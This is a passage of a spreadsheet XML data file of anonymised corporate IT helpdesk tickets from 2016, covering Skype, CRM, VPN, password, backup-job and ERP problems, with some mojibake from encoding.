    <s v="xtqbjieu uablitwr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="infopath installation"/>
    <s v="name:nmpworvu upgtrvnj_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:nmpworvu.upgtrvnj@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:i have an issue saving a lean project to infopath"/>
    <s v="nmpworvu upgtrvnj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype problem"/>
    <s v="_x000d__x000a__x000d__x000a_received from: pcjtisrv.havyuwds@gmail.com_x000d__x000a__x000d__x000a_hi manjgtiry_x000d__x000a__x000d__x000a_i got again skype problem â€“ but not that big as the last time._x000d__x000a__x000d__x000a_every morning when i start my computer i have to add â€žskype&quot; manually (in the add/ins)._x000d__x000a__x000d__x000a_could you please fix this issue aerp? i will be on vacations from oct 2 â€“ oct 17._x000d__x000a__x000d__x000a_"/>
    <s v="pcjtisrv havyuwds"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the back up tape is not ejecting - i am unable to switch tapes for daily back-ups."/>
    <s v="have not been able to switch the tapes for this week."/>
    <s v="hvskpglx bpsfxmon"/>
    <x v="11"/>
  </r>
  <r>
    <s v="external user called for help for calendar issue "/>
    <s v="external user called for help for calendar issue "/>
    <s v="efbwiadp dicafxhv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="can you please remove my email from this mailing list."/>
    <s v="can you please remove my email from this mailing list._x000a__x000a_from: cesgrtar abgrtyreu _x000a_sent: thursday, september 29, 2016 5:12 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: ranjhruy re: ergebnis evakuierungsÃ¼bung 2016_x000a__x000a_hello,_x000a__x000a_can you please remove my email from this mailing list._x000a__x000a_"/>
    <s v="btvmxdfc yfahetsc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1387 failed in job_scheduler at: 09/29/2016 10:57:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1387 failed in job_scheduler at: 09/29/2016 10:57:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="spam mail notification"/>
    <s v="spam mail notification"/>
    <s v="sygionua szunhced"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent help required - crm mobile app issue"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vnetbgio.lqxztben@gmail.com_x000d__x000a__x000d__x000a_we're sorry_x000d__x000a_you can't connect to the server because it doesn't have a trusted ssl certificate. contact your crm administrator for assistance._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="vnetbgio lqxztben"/>
    <x v="22"/>
  </r>
  <r>
    <s v="telefon mit der nummer 1038091558 ist defekt. sinterei germany. bitte reparieren."/>
    <s v="telefon mit der nummer  ist defekt. sinterei germany. bitte reparieren."/>
    <s v="txkgmwbc qohmgwrp"/>
    <x v="32"/>
  </r>
  <r>
    <s v="weekly reboot reminder - backup_tool servers HostName_999, HostName_1048/HostName_1049/HostName_1075"/>
    <s v="from: root@HostName_189.hq.company.com [mailto:root@HostName_189.hq.company.com] _x000d__x000a_sent: thursday, september 29, 2016 10:00 am_x000d__x000a_to: datacenter_x000d__x000a_subject: weekly reboot reminder - backup_tool servers_x000d__x000a__x000d__x000a_ _x000d__x000a_datacenter,_x000d__x000a_   _x000d__x000a_please perform the weekly reboot of the azure backup server clhqsm006, backup_tool management server HostName_999, and the backup_tool proxy servers HostName_1048/HostName_1049/HostName_1075, following completion of the daily backup_tool backup processing.  _x000d__x000a_  _x000d__x000a_- raise the job_scheduler batch fence on HostName_999 to 11._x000d__x000a_- ensure there are no backup jobs running in backup_tool or job_scheduler on HostName_999._x000d__x000a_- logon to the backup_tool management server HostName_999 and perform a restart. _x000d__x000a_- after HostName_999 is available, reboot the proxy servers - can boot travel_toolrently._x000d__x000a_- lower the job_scheduler batch fence on HostName_999 to 9 following all reboots._x000d__x000a__x000d__x000a_- you can reboot clhqsm006 at anytime.   _x000d__x000a_  _x000d__x000a_also, the dell dr4100 storage server is rebooted following the backup_tool server reboots.  this server will be rebooted by the administrator (tim r) following completion of the backup_tool reboots.  _x000d__x000a_  _x000d__x000a__x000d__x000a_"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="probleme mit vpn \wxstfouy isjzcotm"/>
    <s v="probleme mit vpn \wxstfouy isjzcotm"/>
    <s v="wxstfouy isjzcotm"/>
    <x v="24"/>
  </r>
  <r>
    <s v="no crm tab"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ltsqkane.ycgwexdf@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i have no crm tab in my outlook page._x000d__x000a_i was told i need it to fix this._x000d__x000a__x000d__x000a_best "/>
    <s v="ltsqkane ycgwexdf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="stack guard error"/>
    <s v="stack guard error"/>
    <s v="lewbzysd gqdaikbv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent help required- outlook to crm mfg_tooltion issue."/>
    <s v="_x000a__x000a_received from: peojqgvm.qayeptuo@gmail.com_x000a__x000a_my outlook does not have the crm ribbon._x000a_please call _x000a__x000a__x000a__x000a__x000a_"/>
    <s v="peojqgvm qayeptuo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="discount form issue"/>
    <s v="from: fnqelwpk ahrskvln _x000d__x000a_sent: thursday, september 29, 2016 6:02 pm_x000d__x000a_to: trxsychl xamcuong; nwfodmhc exurcwkm; maliowbg cltnwazh_x000d__x000a_cc: nmyzehow gnlcripo_x000d__x000a_subject: amar re: ayuda con conseciones _x000d__x000a__x000d__x000a__x000d__x000a_team,_x000d__x000a__x000d__x000a_please help me check marfhtyios collaboration_platform settings. he is getting this errror with the discount tool._x000d__x000a__x000d__x000a_we already talked to rmegscqu juksmtho and it's not an issue with the tool._x000d__x000a__x000d__x000a_"/>
    <s v="trxsychl xamcuong"/>
    <x v="2"/>
  </r>
  <r>
    <s v="email delegation"/>
    <s v="hatryu bau g called in for an issue where he needed access to fuyidkbv koximpja's email as fuyidkbv koximpja has already left the company on 24th of this month._x000a_hatryu is the manager and he needs fuyidkbv koximpja' mailbox to be delegated to him for some important purpose of emails related to customers. please do the needful at the earliest._x000a__x000a_contact no - "/>
    <s v="vrjwyqtf qoxkapfw"/>
    <x v="26"/>
  </r>
  <r>
    <s v="computer volume"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fpbmtxei.jtqbcnfs@gmail.com_x000d__x000a__x000d__x000a_i am not getting any volume on my computer. please help fix. i need volume for skype._x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="fpbmtxei jtqbcnfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="audio is not working"/>
    <s v="audio is not working"/>
    <s v="imoelsap gxdwkimv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="chrthryui stavenheim : unbale to login to tess via citrix, user name is ccftv15"/>
    <s v="from: oinqckds qieswrfu _x000a_sent: thursday, september 29, 2016 5:30 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: chrthryui stavenheim_x000a_subject: trurthyuft aw: tess account_x000a__x000a_hello, can someone check whether chrthryui stavenheim can login with his account ccftv15 _x000a_via the citrix access _x000a_with this access._x000a_please inform him and myself when the issue is fixed as we have to generate turnover and satisfy customers_x000a__x000a__x000a_oinqckds qieswrfu_x000a_manager tess holemaking design automation_x000a_oinqckds.qieswrfu@gmail.com_x000a__x000a__x000a_von: chrthryui stavenheim [mailto:chrthryui.stavenheim@bank.se] _x000a_gesendet: donnerstag, 29. september 2016 08:12_x000a_an: oinqckds qieswrfu_x000a_betreff: tess account_x000a__x000a_hello robhyertyj_x000a__x000a_i've been unable to login to tess a few weeks now. either password och user name is wrong. user name is ccftv15_x000a_could you please help me out? _x000a__x000a__x000a_med vÃ¤nlig hÃ¤lsning / best "/>
    <s v="oinqckds qieswrfu"/>
    <x v="11"/>
  </r>
  <r>
    <s v="brxaqlwn auzroqes:332415 / 2016 purchasing check status and reports not seen"/>
    <s v="hello team can you please create a credentials for erp (SID_34) and maintain the same in the safe area._x000a_you can copy same access like - kantthyhn"/>
    <s v="rujteoza mcoswhju"/>
    <x v="19"/>
  </r>
  <r>
    <s v="engineering_tool error: machining cloud stopped working"/>
    <s v="engineering_tool error: machining cloud stopped working"/>
    <s v="keinyujo torvxeda"/>
    <x v="0"/>
  </r>
  <r>
    <s v="general issue"/>
    <s v="general issue"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="crm app greyed out"/>
    <s v="crm app greyed out"/>
    <s v="iwqjyzph nhmjyzrw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="uninstallation of adwares from computer"/>
    <s v="uninstallation of adwares from computer"/>
    <s v="keinyujo torvxeda"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call // loud noise //gso"/>
    <s v="blank call // loud noise //gso"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem with company center quick quote"/>
    <s v="_x000a__x000a_received from: vkzwafuh.tcjnuswg@gmail.com_x000a__x000a_hi,_x000a_i'm trying to enter a quote for a distributor in company center. i filled out the information and clicked quick quote. it did nothing. please advise._x000a__x000a_[cid:image001.jpg@01SID_35a25.558fdf50]_x000a__x000a_vkzwafuh tcjnuswg - cmp_x000a_sr. application eng._x000a_vkzwafuh.tcjnuswg@gmail.com_x000a_"/>
    <s v="vkzwafuh tcjnuswg"/>
    <x v="21"/>
  </r>
  <r>
    <s v="skype issue : personal certificate error "/>
    <s v="skype issue : personal certificate error "/>
    <s v="crjhotyk pxslorbe"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company center-password changes"/>
    <s v="i have been setting users up in company center and have run into an problem.  the passwords i set them up with don't work and i need to reset them.  please get back to me as soon as possible because we need to get users up and running in the system"/>
    <s v="qcfmxgid jvxanwre"/>
    <x v="0"/>
  </r>
  <r>
    <s v="EU_tool crashes when confirmations are deleted - not able to remove scrap confirmations that have been rectified in erp"/>
    <s v="there are now over 130 confirmations needing to be deleted since this error was identifies in may. issue was identified to EU_tool support which no longer exists._x000d__x000a__x000d__x000a_i will forward screen capture images to assigned it agent to better explain this error._x000d__x000a__x000d__x000a_alrthyu_x000d__x000a_"/>
    <s v="mlckvyfq aonlxvwb"/>
    <x v="25"/>
  </r>
  <r>
    <s v="network issues"/>
    <s v="_x000d__x000a__x000d__x000a_received from: verena.financial@company.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_at pc eagw8111482sf i have irrecular network issues. sometimes there is no connection to the network possible, after a restart it works again in most cases._x000d__x000a_the hardware i can reach i checked for disconnection or lax connection._x000d__x000a__x000d__x000a_"/>
    <s v="lntbvwgk doqhisxf"/>
    <x v="28"/>
  </r>
  <r>
    <s v="account lock out issue since last two days."/>
    <s v="account lock out issue since last two days._x000d__x000a_"/>
    <s v="qmgspxkf mckfysdh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mqjdyizg amhywoqg - issues with purchasing access."/>
    <s v="please escalate this issue since mqjdyizg amhywoqg is required to approve sales contracts in purchasing.  mqjdyizg amhywoqg is having an issue with accessing purchasing.  please review bill's ad and samacocuntname  in ad.  then contact bihrtyull thadhylman to resolve.  "/>
    <s v="xszoedmc gmhkdsnw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1132 failed in job_scheduler at: 09/29/2016 08:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1132 failed in job_scheduler at: 09/29/2016 08:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="delivery creation issue"/>
    <s v="purchase order number 5019291164, delivery creation issue."/>
    <s v="qfnthlam lxvnwuja"/>
    <x v="17"/>
  </r>
  <r>
    <s v="job Job_1137 failed in job_scheduler at: 09/29/2016 07:55:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1137 failed in job_scheduler at: 09/29/2016 07:55:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="xszoedmc gmhkdsnw or skype.  contract library access to janhetgdyu fox-chatgrylouy"/>
    <s v="xszoedmc gmhkdsnw 7 or skype.  access to collaboration_platform&gt;legal&gt;elengineering toolonic contract management system&gt;libarary&gt;contract archive - industrial folder to janhetgdyu fox-chatgrylouy.  please skype janhetgdyu to work with her. "/>
    <s v="xszoedmc gmhkdsnw"/>
    <x v="15"/>
  </r>
  <r>
    <s v="lean tracker - not able to add  new event  "/>
    <s v="_x000d__x000a__x000d__x000a_received from: fdmobjul.oicarvqt@gmail.com_x000d__x000a__x000d__x000a_need  you help_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35a72.de748da0]_x000d__x000a__x000d__x000a__x000d__x000a_best "/>
    <s v="sojwqapz okihatrb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="spl gl r indicator is missing in customer open items feed."/>
    <s v="spl gl indicator &quot;r - bill of exchange payt request&quot; is missing in customer open items feed."/>
    <s v="tnywkdpl gnjmazuo"/>
    <x v="9"/>
  </r>
  <r>
    <s v="ordnerfreigabe fÃ¼r m: kvp3"/>
    <s v="ordnerfreigabe fÃ¼r m: kvp3"/>
    <s v="nemzycxb xpsgkahw"/>
    <x v="33"/>
  </r>
  <r>
    <s v="hsh"/>
    <s v="_x000a__x000a_received from: aksthyuhath.shettythruy@company.com_x000a__x000a_hi,_x000a__x000a_mr. hatryupsfshytd is  unable to login ess portal. please reset  the password._x000a__x000a_emp no_x000a__x000a_name_x000a__x000a_userid_x000a__x000a_manager_x000a__x000a_20070679_x000a__x000a_aqihfoly xsrkthvf_x000a__x000a_hsh_x000a__x000a_panghyiraj shthuihog_x000a__x000a__x000a__x000a_fyi._x000a__x000a_[cid:image001.png@01SID_35a6c.bb3839a0]_x000a__x000a_with "/>
    <s v="badnzyue nxuqmdwl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="aidw700011 needs to format and reinstall."/>
    <s v="aidw700011 needs to format and reinstall."/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="reinstall EU_tool und hardcopy.\acqpinyd ecygimqd"/>
    <s v="reinstall EU_tool und hardcopy.\acqpinyd ecygimqd"/>
    <s v="acqpinyd ecygimqd"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit companyguest \bctypmjw cbhnxafz"/>
    <s v="probleme mit companyguest \bctypmjw cbhnxafz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit hp drucker local .\petljhxi bocxgins"/>
    <s v="probleme mit hp drucker local .\petljhxi bocxgins"/>
    <s v="petljhxi bocxgins"/>
    <x v="24"/>
  </r>
  <r>
    <s v="ich benÃ¶tige hilfe bei der passwortÃ¤nderung / und bei skype - mikrophone zuschaltung!"/>
    <s v="ich benÃ¶tige hilfe bei der passwortÃ¤nderung / und bei skype - mikrophone zuschaltung!_x000d__x000a_da ich bei skype meetings zwar andere hÃ¶ren kann diese mich aber nicht hÃ¶ren kÃ¶nnen. "/>
    <s v="ecoljnvt lbdqmvfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ughzilfm cfibdamq wanted details to check for company guest"/>
    <s v="ughzilfm cfibdamq wanted details to check for company guest"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account unlock"/>
    <s v="erp SID_34 account unlock"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="automatically generated confirmations from bls aren't transfered to EU_tool"/>
    <s v="system affected: bls (beschichtungsleitstand, engl: coating production system)_x000d__x000a__x000d__x000a_confirmation for process step packing fhurakgsl mldufqov is not transfered to EU_tool. _x000d__x000a__x000d__x000a_sample orders: 226901542, 226907395_x000d__x000a_"/>
    <s v="xsjqhdgp ymstzudl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="i can not create a delivery order number 5019289193nd; error message apo server not o.k"/>
    <s v="mm 4983099 _x000d__x000a_bestellnumer 5019289193_x000d__x000a_"/>
    <s v="uxpytsdk kyamilds"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 09/29/2016 04:17:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a__x000d__x000a_[critical] from: bda-net@lhqsm435.company.company.com &quot;lhqsm435.company.company.com [/g]&quot;  time: 9/29/2016 3:16:25 am_x000d__x000a_ ipc failure reading net message (ipc write error_x000d__x000a_ system error: [10053] software caused connection abort_x000d__x000a_) =&gt; aborting._x000d__x000a__x000d__x000a_backup statistics:_x000d__x000a_          _x000d__x000a_  session queuing time (hours)         0.00        _x000d__x000a_  -------------------------------------------      _x000d__x000a_  completed disk agents ........         37          _x000d__x000a_  failed disk agents ...........          1          _x000d__x000a_  aborted disk agents ..........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  disk agents total  ...........         38          _x000d__x000a_  ===========================================      _x000d__x000a_  completed media agents .......          1          _x000d__x000a_  failed media agents ..........          0          _x000d__x000a_  aborted media agents .........          0          _x000d__x000a_  -------------------------------------------      _x000d__x000a_  media agents total  ..........          1          _x000d__x000a_  ===========================================      _x000d__x000a_  mbytes total .................  534700 mb        _x000d__x000a_  used media total .............          1          _x000d__x000a_  disk agent errors total ......          2    _x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 09/29/2016 04:17:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="engineering tool malfunction"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jkpwisnf.lgpdyncm@gmail.com_x000d__x000a__x000d__x000a_dear sir_x000d__x000a_yesterday, i upgraded engineering tool application and now i am facing below problem._x000d__x000a_search and new option is  not appearing in customer find/add tab. kindly help to resolve the issue._x000d__x000a__x000d__x000a_[cid:image001.jpg@01SID_35a56.d1291481]_x000d__x000a__x000d__x000a_"/>
    <s v="jkpwisnf lgpdyncm"/>
    <x v="25"/>
  </r>
  <r>
    <s v="purchasing catalogue de-wollschlÃ¤ger needs immediatly to be deleted"/>
    <s v="the company is bankruped"/>
    <s v="rhinvtua aquyjfbs"/>
    <x v="29"/>
  </r>
  <r>
    <s v="telephony_software problem"/>
    <s v="there are connection problems, while calling the sr. the sr gets a silent line while i get connected with the warehouse_toolmail immediately."/>
    <s v="xjazwpmd sjirdnam"/>
    <x v="6"/>
  </r>
  <r>
    <s v="EU_tool - can not get the transfer times of our employees since today"/>
    <s v="please see the attached email"/>
    <s v="xnlapdeq wupaeqlv"/>
    <x v="25"/>
  </r>
  <r>
    <s v="vuxdrbng owqplduj : s1- k1"/>
    <s v="vuxdrbng owqplduj : s1- k1"/>
    <s v="cwryvksu cedsairg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2645 failed in job_scheduler at: 09/29/2016 03:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2645 failed in job_scheduler at: 09/29/2016 03:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="selecting customer"/>
    <s v="i cannot select the customer and cannot edit it, see the picture below. there is no button for &quot;new&quot; or &quot;find&quot; which we had in the previous versions and the &quot;select&quot; button is not active"/>
    <s v="nzpfadir swzpfnlj"/>
    <x v="25"/>
  </r>
  <r>
    <s v="setup new ws \vuxdrbng owqplduj"/>
    <s v="setup new ws \vuxdrbng owqplduj"/>
    <s v="vuxdrbng owqplduj"/>
    <x v="24"/>
  </r>
  <r>
    <s v="HostName_66:volume: f:\ label:dat1-HostName_66 9a625d75 on server: is over 85% space consumed. space available: 648 k"/>
    <s v="volume: f:\ label:dat1-HostName_66 9a625d75 on server: is over 85% space consumed. space available: 648 k"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="reset the password for bzwrchnd ysfiwvmo on windows ç™»é™†"/>
    <s v="reset the password for bzwrchnd ysfiwvmo on windows ç™»é™†"/>
    <s v="bzwrchnd ysfiwvmo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_2588 failed in job_scheduler at: 09/29/2016 01:30:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_2588 failed in job_scheduler at: 09/29/2016 01:30:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="outlook funktioniert nicht"/>
    <s v="am rechner evhw8114148 funktioniert outlook nicht mehr._x000d__x000a_"/>
    <s v="jnktafrs ytxiowbh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="lean tracker not opening"/>
    <s v="lean tracker not opening"/>
    <s v="saerpwno qsdfmakc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account locked in ad"/>
    <s v="account locked in ad"/>
    <s v="gvsabjhq cgwsbiep"/>
    <x v="0"/>
  </r>
  <r>
    <s v="po5616680457 same tax issue"/>
    <s v="po5616680457 same tax issue"/>
    <s v="dizquolf hlykecxa"/>
    <x v="9"/>
  </r>
  <r>
    <s v="modify jb_ecc_bw_zsd531 to pull 36 month sales data from zsd532 table"/>
    <s v=" we are in the process of refreshing history in rr and we need to send 3 years sales data from zsd532 table through bobj script jb_ecc_bw_zsd531. please modify the programdnty to pull 36 month data (-1 to -36) from zsd532, once the extract is complete we will switch it back to delta extraction."/>
    <s v="ualdxfir kizjmqte"/>
    <x v="20"/>
  </r>
  <r>
    <s v="create guest wifi - vvrassyhrt"/>
    <s v="create guest wifi - vvrassyhrt"/>
    <s v="pxsghrjd wiehqmka"/>
    <x v="33"/>
  </r>
  <r>
    <s v="i am unable to login to the attendance_tool --so reset my attendance_tool password "/>
    <s v="reset my attendance_tool password "/>
    <s v="boirqctx bkijgqry"/>
    <x v="0"/>
  </r>
  <r>
    <s v="business_client - authorisation"/>
    <s v=" hi,_x000a__x000a_pl. provide business_client authorization to uypsqcbm fqpybgri for checking/downloading drawings._x000a__x000a_cc: irgsthy , pl. provide your employee id _x000a_"/>
    <s v="oavigqeu kjmvtfpc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to login to skype"/>
    <s v="not able to login to skype"/>
    <s v="tcbonyes gpfacron"/>
    <x v="0"/>
  </r>
  <r>
    <s v="sound card issue in dell latitude m4800 laptop"/>
    <s v="sound card issue in dell latitude m4800 laptop"/>
    <s v="tcbonyes gpfacron"/>
    <x v="18"/>
  </r>
  <r>
    <s v="vpn ä¸èƒ½ç™»å½•ã€‚"/>
    <s v="[â€Ž2016/â€Ž9/â€Ž29 9:14] daisy huang: _x000d__x000a_hi, vpn æŒ‰ç…§é‚®ä»¶é‡Œè®¾ç½®çš„æ”¹äº†ï¼Œæ€Žä¹ˆè¿˜æ˜¯ç™»ä¸ä¸ŠåŽ»_x000d__x000a_your system failed for antivirus check. please ensure the following is true and try again or contact your administrator: your antivirus software is enabled. it is up to date (antivirus database no older than 30 days) you have recently scanned your system (not longer than 7 days ago) _x000d__x000a_[â€Ž2016/â€Ž9/â€Ž29 9:15] obuwfnkm ufpwmybi: _x000d__x000a_ä½ çš„æ€æ¯’è½¯ä»¶æœ‰é—®é¢˜_x000d__x000a_ç—…æ¯’åº“æ²¡æœ‰æ›´æ–°_x000d__x000a_"/>
    <s v="lzaqjxgi lzfycegm"/>
    <x v="31"/>
  </r>
  <r>
    <s v="usa - (company) : interface fastethernet0/16 &amp; gigabitethernet1/0/18 is down since  09:23 pm et on 09/28."/>
    <s v="interface: fastethernet0/16 Â· asheshopsw5 on company-na-usa-usa-2950-access-sw02 is down_x000d__x000a_interface: gigabitethernet1/0/18 Â· asheshopsw2 on company-na-usa-usa-3850-core-sw01 is down"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="7"/>
  </r>
  <r>
    <s v="prdord 226040587   226040835    226040589    226901663   can not relese "/>
    <s v="115939476   226040835    226040589  user status cer1 is active._x000d__x000a_ 226901663    user status cer2 is active._x000d__x000a_can not  create the production order _x000d__x000a_please help to fix it ."/>
    <s v="rqpfshjd qiulphdr"/>
    <x v="44"/>
  </r>
  <r>
    <s v="can not transfer customer in tracking to crm"/>
    <s v="from: crjhotyk pxslorbe _x000d__x000a_sent: thursday, september 29, 2016 2:57 am_x000d__x000a_to: rakthyesh ramdntythanjesh_x000d__x000a_subject: crm crjhotyk pxslorbe_x000d__x000a__x000d__x000a_can not transfer customer in tracking to crm- should be able to right click and click track to crm, does not work._x000d__x000a__x000d__x000a_"/>
    <s v="crjhotyk pxslorbe"/>
    <x v="39"/>
  </r>
  <r>
    <s v="hr_tool e-time problems"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nwzhlktu.plktredg@gmail.com_x000d__x000a__x000d__x000a_i am trying to enter etime on the hub but only get this screen:  it will not go anywhere from this screen.  can this be corrected?  please get in touch with me tomorrow during office hours._x000d__x000a__x000d__x000a_[cid:image003.jpg@01SID_359b8.f6a48660]_x000d__x000a__x000d__x000a_best "/>
    <s v="nwzhlktu plktredg"/>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kdjfhwua arfpnhbj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="engineering_tool urgent"/>
    <s v="_x000a__x000a_received from: uezonywf.rldbvipu@gmail.com_x000a__x000a_i have access to engineering_tools (engineering_tool) but my name doesn't show up in the drop down for salesman or uacyltoe hxgaycze performed by and it isn't allowing me to write it in. can i please be added aerp._x000a__x000a_tommyth duyhurmont_x000a_channel partner sales engineer_x000a_company inc._x000a__x000a_uezonywf.rldbvipu@gmail.com&lt;mailto:uezonywf.rldbvipu@gmail.com&gt;_x000a_www.company.com&lt;_x000a__x000a_www.company.com/engineering_tool/en/home.html_x000a__x000a_[_x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_"/>
    <s v="uezonywf rldbvipu"/>
    <x v="25"/>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ioulqtmk dqevzrsg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for ytzpxhql ntfxgpms using password_management_tool password reset."/>
    <s v="password was reset  but will not allow reset for SID_34 erp production"/>
    <s v="ytzpxhql ntfxgpms"/>
    <x v="16"/>
  </r>
  <r>
    <s v="collaboration_platform for business continues to sync all the time"/>
    <s v="collaboration_platform is using a lot of memory on my computer, it is trying to sync a large number of file +30,000, i try to exit it. i try to end the process nothing works. i would like to uninstall it if possible. can this be fixed?_x000a_: contact #"/>
    <s v="znwytghq sibchqoz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="pwkrlqbc zslqfmka"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="pwkrlqbc zslqfmka"/>
    <x v="0"/>
  </r>
  <r>
    <s v="frequent account lockout"/>
    <s v="frequent account lockout"/>
    <s v="mrduhsci xmvkzqja"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to open this link "/>
    <s v="access to open this link for corp contracts _x000a__x000a__x000a_i don't have access to open this link for corp contracts _x000a_can you please review and usa me access _x000a__x000a__x000a__x000a_dthyan matheywtyuews_x000a_sales manager gl2_x000a_oetlgbfw.bsctrnwp@gmail.com_x000a__x000a_"/>
    <s v="oetlgbfw bsctrnwp"/>
    <x v="15"/>
  </r>
  <r>
    <s v="mobile device activation"/>
    <s v="from: tsbnfixp numwqahj _x000a_sent: wednesday, september 28, 2016 9:01 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: amar wg: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird._x000a_importance: high_x000a__x000a_please usa access for that company owned device._x000a_user-id: grbhybrdg_x000a_tsbnfixp numwqahj_x000a__x000a_thanking you in anticipation!_x000a__x000a_oqlcdvwi pulcqkzo_x000a__x000a__x000a_von: microsoft outlook _x000a_gesendet: mittwoch, 28. september 2016 17:29_x000a_an: tsbnfixp numwqahj &lt;tsbnfixp.numwqahj@gmail.com&gt;_x000a_betreff: die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis der zugriff vom administrator gewÃ¤hrt wird._x000a__x000a_der zugriff von ihrem mobilen gerÃ¤t auf inhalte Ã¼ber exchange activesync ist vorrÃ¼bergehend blockiert, da es in quarantÃ¤ne gestellt ist. sie mÃ¼ssen keine aktion durchfÃ¼hren. der inhalt wird automatisch heruntergeladen, sobald der zugriff vom administrator gewÃ¤hrt wird._x000a__x000a_please ignore the above paragraph. we cannot change it or delete it. _x000a__x000a_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 _x000a__x000a_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 _x000a__x000a_currently approved handheld devices can be found in this policy: _x000a__x000a_wireless mobility technical document _x000a__x000a_the above policy will be updated as other devices are approved for use. _x000a__x000a_if you own an approved device and would like to take advantage of this opportstorage_product you can submit a ticketing_tool ticke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 _x000a__x000a_any ticket without the signed form will be cancelled. you have 2 weeks to process and submit the form before your device will be denied (deleted from quarantine). _x000a__x000a_wireless mobility standard procedure _x000a_informationen zu ihrem mobilen gerÃ¤t:_x000a_gerÃ¤temodell: iphone6c2_x000a_gerÃ¤tetyp: iphone_x000a_gerÃ¤te-id: fvqfj874r56gj3r4jb39kdgu3s_x000a_gerÃ¤tebetriebssystem: ios 10.0.sartlgeo lhqksbdx4a403_x000a_gerÃ¤tebenutzer-agent: apple-iphone6c2/1401.403_x000a_gerÃ¤te-imei: _x000a_exchange activesync-version: 16.0_x000a_gerÃ¤tezugriffsstatus: quarantined_x000a_grund fÃ¼r gerÃ¤tezugriffsstatus: global_x000a_um 